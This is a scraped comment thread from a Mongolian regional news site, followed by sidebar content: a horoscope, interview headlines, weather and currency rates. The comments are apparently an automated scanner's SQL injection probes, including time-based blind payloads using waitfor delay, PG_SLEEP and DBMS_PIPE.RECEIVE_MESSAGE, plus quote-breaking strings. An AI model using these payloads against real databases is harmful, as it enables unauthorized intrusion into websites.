  8nm7wKfb'; waitfor delay '0:0:15' --

 • Guest1

  LgyxmpHT

  2023-06-13 02:37 | 192.168.234.14

  -5 OR 368=(SELECT 368 FROM PG_SLEEP(15))--

 • Guest1

  LgyxmpHT

  2023-06-13 02:37 | 192.168.234.14

  -5) OR 718=(SELECT 718 FROM PG_SLEEP(15))--

 • Guest1

  LgyxmpHT

  2023-06-13 02:38 | 192.168.234.14

  -1)) OR 732=(SELECT 732 FROM PG_SLEEP(15))--

 • Guest1

  LgyxmpHT

  2023-06-13 02:38 | 192.168.234.14

  M9tGxnBO' OR 108=(SELECT 108 FROM PG_SLEEP(15))--

 • Guest1

  LgyxmpHT

  2023-06-13 02:38 | 192.168.234.14

  WSakrZi8') OR 932=(SELECT 932 FROM PG_SLEEP(15))--

 • Guest1

  LgyxmpHT

  2023-06-13 02:39 | 192.168.234.14

  tYPf9ego')) OR 665=(SELECT 665 FROM PG_SLEEP(15))--

 • Guest1

  LgyxmpHT

  2023-06-13 02:39 | 192.168.234.14

  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

 • Guest1

  LgyxmpHT

  2023-06-13 02:39 | 192.168.234.14

  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

 • Guest1

  LgyxmpHT

  2023-06-13 02:39 | 192.168.234.14

  1'"

 • Guest1

  LgyxmpHT

  2023-06-13 02:39 | 192.168.234.14

  1����%2527%2522

 • Guest1

  LgyxmpHT

  2023-06-13 02:39 | 192.168.234.14

  @@MRk3A

 • Guest1

  LgyxmpHT

  2023-06-13 02:39 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:39 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:40 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:40 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:40 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:40 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:40 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:40 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:40 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:40 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:40 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:41 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:41 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:41 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:41 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:41 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:42 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:42 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:42 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:42 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:42 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-14 06:37 | 192.168.234.14

  1

Сэтгэгдэл үлдээх

wave
зочин1
зочин2
зочин3
зочин4
зочин5
зочин6
зочин7
зочин8

Уншигчдын бичсэн сэтгэгдэлд ErdenetToday.mn хариуцлага хүлээхгүй болно. Та сэтгэгдэл бичихдээ хууль зүйн болон ёс суртахууны хэм хэмжээг хүндэтгэнэ үү. Хэм хэмжээг зөрчсөн сэтгэгдэлийг админ устгах эрхтэй.

ӨНӨӨДРИЙН ЗУРХАЙ

wave
Билгийн тооллын 19
2023-10-03 | мягмар гараг
Нар 06:53 минутад мандаж 18:29 минутад жаргана.

Намрын дунд цагаагчин тахиа сарын нэг цагаан хөх морь өдөр

Үс засуулвал: Сайн нөхөртэй нөхөрлөнө
Суудал: Мод

Аргын тооллын 10 сарын 3, Ангараг гараг. Билгийн тооллын 19, Нэгэн эхийн зургаан хөвгүүн одтой, хөх морь өдөр. Өдрийн наран 6 цаг 53 минутад мандан, 18 цаг 29 минутад жаргана. Тухайн өдөр бар, нохой жилтнээ аливаа үйлийг хийхэд эерэг сайн ба бич, тахиа жилтнээ сөрөг муу нөлөөтэй тул элдэв үйлд хянамгай хандаж, биеэ энхрийлүүштэй. Эл өдөр худалдаа арилжаа хийх, бизнэс эхлэх, хүү сангийн эх хатгах, эд агуурс авах, зээл авах, арвижуулах, дэлгэрүүлэх үйлийг эхлэх, угаал үйлдэх, тангараг тавих, гэр, байшингийн суурь тавихад сайн. Гэр бүрэх, хэрүүл тэмцэл хийхэд муу. Өдрийн сайн цаг нь хулгана, үхэр, туулай, морь, бич, тахиа болой. Хол газар яваар одогсод хойш мөрөө гаргавал зохистой. Тэрсүүд өдөр. Үс шинээр үргээлгэх буюу засуулбал “Сайн нөхөртэй учирах” хэмээх сайн.

Ярилцлага

wave
Г.ЦОГТГЭРЭЛ: Тээрмийг хугацаанаас нь өмнө сольсон нь том амжилт юм
Эрдэнэт үйлдвэрийн анхдагч болсон нь миний бахархал
 • .
 • 18/09/2023
С.Саранцэцэг: Ээлжнээс буугаад л аж ахуйн ажилдаа орох нь бидний амьдралын хэв маяг
М.ОТГОН: Бид 45 жилийн ойгоо их хөдөлмөр, бүтээлээр угтахаар ажиллаж байна
Р.ОЮУНЦЭЦЭГ: Эрдэнэт үйлдвэрийн гадаад ажилтны квотыг зургаан хувь байхаар тогтоосон
С.Наранцогт: “Эрдэнэс Монгол” нэгдэл харьяа компаниудаа дэмжин, тулгамдаж буй асуудлуудыг нь шийдвэрлэх үүрэгтэй
Н.ЭНХБОЛД: Бодлого бол шийдвэр гаргалтын удирдамж юм
Ц.ОРГИЛ: Эрдэнэт үйлдвэрийн үйл ажиллагаанаас үүсэх материалын цацрагийн агуулгын түвшин хэвийн байна
Д.Жийнээ: Үйлдвэр, хотын түүх дурсгалыг бүтээлцэж явснаараа бахархдаг
Наадмын өнгө

Хайлт хийх ...

ESC дарж буцах боломжтой.

Цаг агаар
Эрдэнэт хот
Өнөөдөр
2023-10-03
10°C
Үүл багаснa
Салхи: 6м/сек
-2°C
Үүлшинэ
Салхи: 5м/сек
2023-10-04
14°C
Багавтар үүлтэй
Салхи: 5м/сек
-2°C
Багавтар үүлтэй
Салхи: 5м/сек
2023-10-05
15°C
Багавтар үүлтэй
Салхи: 5м/сек
2°C
Багавтар үүлтэй
Салхи: 5м/сек
2023-10-06
12°C
Ялимгүй хур тунадас
Салхи: 5м/сек
3°C
Хур тунадас
Салхи: 4м/сек
2023-10-07
10°C
Үүлшинэ
Салхи: 6м/сек
1°C
Ялимгүй хур тунадас
Салхи: 6м/сек
Валютын ханш
Монголбанк
Валют Ханш
USD 3457.7 -0.0005 %
EUR 3655.48 -0.0033 %
GBP 4216.32 -0.0038 %
RUB 35.26 -0.0096 %
CNY 473.56 -0.0005 %
KRW 2.56 -0.0039 %
CAD 2545.61 -0.0106 %
NZD 2071.85 -0.0060 %
AUD 2216.56 -0.0109 %
JPY 23.09 -0.0061 %
HKD 441.46 -0.0010 %
SGD 2525.62 -0.0055 %
CHF 3791.96 -0.0020 %
SEK 316.18 -0.0090 %
TRY 125.94 -0.0014 %
THB 93.77 -0.0112 %